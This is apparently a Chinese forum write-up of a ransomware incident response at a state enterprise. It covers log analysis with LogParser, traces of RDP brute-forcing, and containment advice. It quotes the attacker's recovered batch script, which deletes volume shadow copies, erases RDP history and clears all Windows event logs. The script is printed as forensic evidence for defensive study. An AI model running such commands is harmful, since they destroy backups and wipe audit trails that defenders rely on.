某国企勒索病毒应急响应

某国企勒索病毒应急响应

整体排查思路

  • 先看日志,要和勒索争分夺秒,你得看这台终端怎么中的毒,哪个IP过来的
  • 看对外连接,有没有攻击其他人
  • 看异常进程,父进程,签名,启动项,注册表,dll调用,计划任务,驱动
  • 关键目录文件排查,感染时间,文件后缀,解密联系方式

应急开始一定要记住,不要使用删除以及更改文件属性的命令,建议在桌面建立sample文件夹,作为我们存放样本的文件夹

检测阶段

某国企上午来突然接到通知,总部中了勒索病毒,迅速通知受害主机相关人员对其断网隔离。电话和客户了解以下现场大概情况,由于受害主机是终端PC查明勒索病毒如何进来的,是否有扩散,扩散什么程度,直接重装系统即可。某日上午,远程终端进行排查,发现前一天晚上22:32分左右,来自于安徽的一台终端机器对北京终端进行3389爆破,安徽终端密码为0,这你就没办法了对吧。终端PC装有360天擎,但是当我远程过去的时候,360天擎处于关闭状态,应该是攻击者利用某种手段把天擎关闭掉了,并破坏了天擎主动防御模块。

日志

因为甲方这边只有天擎,没有态势感知之类的设备,一切只能看咱自己经验了
诶,由于分析日志全是在客户机器上日志什么的都没拿出来,没法给大家分享,我就说说我如何现场百度logparse 用法现场分析各种日志

logparse

你在应急的时候像logparseautoruns,processexplore,processmonitor,还有其他的各种工具是应该直接打包压缩,准备随时传给客户到机器上的

https://www.microsoft.com/en-us/download/details.aspx?id=24659

上面是下载地址,安装也是比较简单的直接双击打开,点击点击点击即可

C:\Program Files (x86)\Log Parser 2.2\LogParser.exe //logparse的路径

我用到的命令组合

LogParser.exe -i:EVT "SELECT TimeGenerated,EXTRACT_TOKEN(Strings,0,'|') AS USERNAME,EXTRACT_TOKEN(Strings,2,'|') AS SERVICE_NAME,EXTRACT_TOKEN(Strings,5,'|') AS Client_IP FROM '日志的路径.evtx' WHERE EventID=675" > 1.csv
___________
/*字段说明*/
-i:EVT: 指定evtx类型的日志格式,当然也可以有CSV格式的还有IIW3C格式的
TimeGenerated,EXTRACT_TOKEN: 时间戳字段
USERNAME,EXTRACT_TOKEN: 用户名字段
SERVICE_NAME,EXTRACT_TOKEN: 服务名字段

然后用excle打开csv文件,对其进行处理得到以下表格中的数据,用来后续进行排查

外网IP 内网IP
220.*.184.157 9...241
95.*.252.94 9...88
112.*.100.151 9...13
119.1*.58.165 9...25
218.1*9.86.210 9...8
141.9*.81.191 9...50
2.187.7*.96 9...51
61.14*.213.18 9.*.97.123
193.1*.16.246 9...122
61.1*7.103.187 9.*.20.34
125.*7.40.217 89.*.62.91
125.1*7.174.145 193.1*8.16.250
193.*8.16.252 11.*.97.123

这些机器都是由另一位安服同志排查的,所以后来情况也没和我同步,诶,所以我就不清楚了

确定感染时间

勒索感染时间为早上5:27分

感染后缀名

C4H

解密联系方式

敏感目录文件

我们在用户的temp目录下发现了一个名称叫做tmp61DD.tmp.batbat文件

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"%

C:\Users\lazy\Videos>目录下发现了黑客爆破的工具hydra,NS估计也是黑客的工具,但是被加密了也分析不出来

进程分析

我们祭出了AutoRuns,ProcessExplorer,ProcessMonitor,这三个工具应该是我们应急的过程中常用的三剑客,其实火绒剑就足够了,但是不太喜欢用这个
我们用autoruns发现了一个很可疑的东西,就是暴风一键激活的工具,而且2016年就有了,这就很可能构成APT,但是甲方不太重视这里边我们忽略后边在说


ProcessExplorer发现这个终端一直在请求一个矿池和勒索的IP,那个截图我找不到了

我们从注册表中看到

然后,我们在进程中嗨发现iexplore.exe这个程序也不对劲,疑似是dll劫持,截图找不到了

于是我把所有程序都丢到virustotal,发现确实有问题,

然后我们发现这个勒索的命名都非常奇怪,叫做

$360Honeypot
$360LockFile

有没有觉得很熟悉?DLP(数据防泄漏?)这黑客竟然以这个命名,我觉得十分的奇怪,不深究了

抑制阶段

因为是终端机器,所以也没必要升级打补丁恢复数据什么的直接重装系统就行
但是,如果你是碰到的服务器被勒索了,那还是一步一步做把

1. 对系统进行补丁更新,封堵病毒传播途径;
2. 制定严格的口令策略,避免弱口令;
3. 结合备份的网站日志对网站应用进行全面代码审计,找出攻击者利用的漏洞入口进行封堵;
4. 配合全流量设备对全网中存在的威胁进行分析,排查问题;

样本取证

取证的样本大概就是这样

根除阶段

重装系统

相关安全建议

  1. 使用强密码
  2. 别什么垃圾软件都用,激活买个序列号比啥不强,或者搭个KMS服务器比啥不强,用什么暴风激活
1赞

服务器资源由ZeptoVM赞助

Partners Wiki IRC